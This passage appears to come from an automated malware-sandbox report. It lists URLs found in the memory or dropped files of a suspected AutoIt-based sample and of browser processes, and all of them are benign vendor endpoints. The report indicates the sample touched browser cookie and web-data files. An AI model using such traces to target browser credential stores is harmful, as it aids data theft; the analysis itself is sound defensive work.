                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
                Source: chrome.exe, 0000000F.00000003.2547178754.0000327000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547226137.0000327001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547038722.0000327000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547114181.0000327001064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
                Source: trZG6pItZj.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                Source: chrome.exe, 0000000F.00000003.2549261296.00003270006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549336556.0000327000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547178754.0000327000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547226137.0000327001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549179677.0000327000C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547038722.0000327000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547154386.00003270010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549286147.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547114181.0000327001064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
                Source: chrome.exe, 0000000F.00000003.2549261296.00003270006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549336556.0000327000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547178754.0000327000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547226137.0000327001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549179677.0000327000C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547038722.0000327000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547154386.00003270010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549286147.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547114181.0000327001064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
                Source: chrome.exe, 0000000F.00000003.2549261296.00003270006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549336556.0000327000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547178754.0000327000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547226137.0000327001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549179677.0000327000C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547038722.0000327000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547154386.00003270010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549286147.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547114181.0000327001064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/LICENSE.txt
                Source: chrome.exe, 0000000F.00000003.2549261296.00003270006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549336556.0000327000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547178754.0000327000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547226137.0000327001080000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549179677.0000327000C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547038722.0000327000F24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547154386.00003270010B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549286147.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2547114181.0000327001064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                Source: Procedures.com, 0000000B.00000000.2113380186.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp, Night.0.dr, Procedures.com.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                Source: Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, P8Q1VA.11.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: msedge.exe, 00000013.00000002.2690100613.0000019CC1BB1000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000017.00000002.2851481862.000001CDC66FA000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2821385203.000001CDC66FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://assets.msn.cn/resolver/
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://assets.msn.com/resolver/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://bard.google.com/
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://bit.ly/wb-precache
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, UKNGDB.11.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, UKNGDB.11.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://browser.events.data.msn.cn/
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://browser.events.data.msn.com/
                Source: Reporting and NEL.26.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://c.msn.com/
                Source: Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, P8Q1VA.11.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: offscreendocument_main.js.24.dr, service_worker_bin_prod.js.24.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003ED7000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, Web Data.24.dr, P8Q1VA.11.dr, DJWL6P.11.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003ED7000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, Web Data.24.dr, P8Q1VA.11.dr, DJWL6P.11.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chrome.exe, 0000000F.00000003.2550296822.0000327000E88000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2693271301.000074D00238C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000002.2856151475.000028280236C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                Source: manifest.json.24.drString found in binary or memory: https://chrome.google.com/webstore/
                Source: chrome.exe, 0000000F.00000003.2542404894.0000327000C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2549534905.0000327000C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2544422708.0000327000C78000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2542475225.0000327000C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2564944836.0000327000C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2546538152.0000327000E88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550296822.0000327000E88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                Source: msedge.exe, 00000017.00000002.2856151475.000028280236C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstorekgejglhpjiefppelpmljglcjbhoiplfn((
                Source: chrome.exe, 0000000F.00000003.2582507876.0000007000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2534111981.000000700071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                Source: chrome.exe, 0000000F.00000003.2582507876.0000007000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2534111981.000000700071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                Source: chrome.exe, 0000000F.00000003.2583575786.000032700177C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                Source: chrome.exe, 0000000F.00000003.2582507876.0000007000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2534111981.000000700071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                Source: msedge.exe, 00000013.00000002.2693271301.000074D00238C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000002.2856151475.000028280236C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.24.drString found in binary or memory: https://chromewebstore.google.com/
                Source: chrome.exe, 0000000F.00000003.2530531866.00005788002E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2530508400.00005788002DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                Source: chrome.exe, 0000000F.00000003.2549471455.0000327000BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2542523577.0000327000BD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2538044559.00003270004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.2692591204.000074D002240000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000002.2855446365.0000282802234000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.24.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, UKNGDB.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, UKNGDB.11.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: Reporting and NEL.26.drString found in binary or memory: https://deff.nelreports.net/api/report
                Source: 2cc80dabc69f58b6_0.24.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: Reporting and NEL.26.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
                Source: manifest.json0.24.drString found in binary or memory: https://docs.google.com/
                Source: chrome.exe, 0000000F.00000003.2581576826.0000327001C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2p
                Source: chrome.exe, 0000000F.00000003.2582507876.0000007000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2534111981.000000700071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                Source: chrome.exe, 0000000F.00000003.2534111981.000000700071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                Source: chrome.exe, 0000000F.00000003.2588677175.0000327001F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2589259392.0000327001FBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588251037.0000327001EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search?source=ntp
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
                Source: chrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/upload
                Source: chrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/uploadbyurl
                Source: chrome.exe, 0000000F.00000003.2582507876.0000007000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2534111981.000000700071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
                Source: chrome.exe, 0000000F.00000003.2534871121.0000007000878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload
                Source: chrome.exe, 0000000F.00000003.2534111981.000000700071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2580848332.0000327001040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                Source: chrome.exe, 0000000F.00000003.2536974657.00003270001C8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://m.google.com/devicemanagement/data/api
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://m.kugou.com/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://m.soundcloud.com/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://m.vk.com/
                Source: chrome.exe, 0000000F.00000003.2588677175.0000327001F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2589259392.0000327001FBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588251037.0000327001EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=rm&amp;ogbl
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
                Source: msedge.exe, 00000017.00000002.2856509680.00002828024C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                Source: msedge.exe, 00000017.00000002.2856509680.00002828024C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                Source: Cookies.26.drString found in binary or memory: https://msn.comXIDv10MU
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://music.amazon.com
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://music.apple.com
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://music.yandex.com
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://ntp.msn.cn/edge/ntp
                Source: 000003.log.24.dr, 2cc80dabc69f58b6_0.24.drString found in binary or memory: https://ntp.msn.com
                Source: 000003.log0.24.drString found in binary or memory: https://ntp.msn.com/
                Source: QuotaManager.24.drString found in binary or memory: https://ntp.msn.com/_default
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://ntp.msn.com/edge/ntp
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
                Source: Session_13379405062517659.24.drString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
                Source: QuotaManager.24.dr, QuotaManager-journal.24.drString found in binary or memory: https://ntp.msn.com/ntp.msn.com_default
                Source: 2cc80dabc69f58b6_0.24.drString found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
                Source: msedge.exe, 00000017.00000002.2856509680.00002828024C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
